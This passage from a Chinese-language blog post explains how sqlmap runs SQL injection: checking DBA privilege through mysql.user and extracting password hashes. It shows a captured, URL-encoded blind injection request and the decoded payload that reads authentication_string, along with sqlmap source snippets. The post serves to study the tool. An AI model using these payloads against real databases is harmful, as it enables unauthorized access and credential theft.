聊一聊SQLMAP在进行SQL注入时的整个流程

第二个命令返回了 1 ，我们将查询命令提取出来：

SELECT super_priv FROM mysql.user WHERE user=0xxxxx LIMIT 0,1 

在 mysql 数据库下的 user 表中查询 super_priv (超级权限)的值：

返回了 Y，所以我们判断是否为 dba 的思路就是通过查看 mysql.user 下 super_priv 的值。

这个命令有一个坑，有的时候我们所注入的服务器上面并没有 mysql 这个数据库，所以用这个命令的前提是 mysql 这个数据库要存在。

2. 查询密码

抓的包：

GET /xxx.php?id=1%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28DISTINCT%28authentication_string%29%29%20AS%20CHAR%29%2C0x20%29%20FROM%20mysql.user%20WHERE%20user%3D0x64623833323331%29%2C1%2C1%29%29%3E48 HTTP/1.1 
Host: www.xxxx.xxx 
Accept: */* 
User-Agent: sqlmap/1.3.6.58#dev (http://sqlmap.org) 
Connection: close 
Cache-Control: no-cache 

解码：

/xxxx.php?id=1 AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(authentication_string)) AS CHAR),0x20) FROM mysql.user WHERE user=0xxxxx),1,1))>48 

这里有个很有趣的地方，我的 sqlmap 是 1.3.6 的版本，不知道之前的是不是，他是从 mysql.user 中获取 authentication_string 的值，但是很有趣的是，这个值只有在 mysql 版本 5.7 以上，password 才会变成 authentication_string，我们也可以从 queries.xml 中找到这条语句：

<passwords> 
            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/> 
            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/> 
</passwords> 

发现默认就是这个 authentication_string，所以我们这里直接修改 queries.xml 中的语句，将查询的列明改成 password 再测试一下。

后面测试发现，我们在没有修改的情况下，sqlmap 也会跑出密码，而且查看 payload 之后，sqlmap 先是查了 authentication_string，然后查了 password：

看下源码，然后找到了( sqlmap/plugins/generic/users.py)：

values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False) 

这里用 replace 将两个列明进行了替换，里面有个 ifel 的语句，要是第一次没找到就会进行替换，这样我们的问题就解决掉啦，sqlmap 还是想的挺周全的哈哈。

总结

sqlmap 里面的内容实在是太多太多，想要摸索里面的内容需要花费大量的时间，当然收获也是成正比的，搞清楚sqlmap 的流程原理，对我们 sql 注入技术会有很大的提升。

（编辑：西安站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!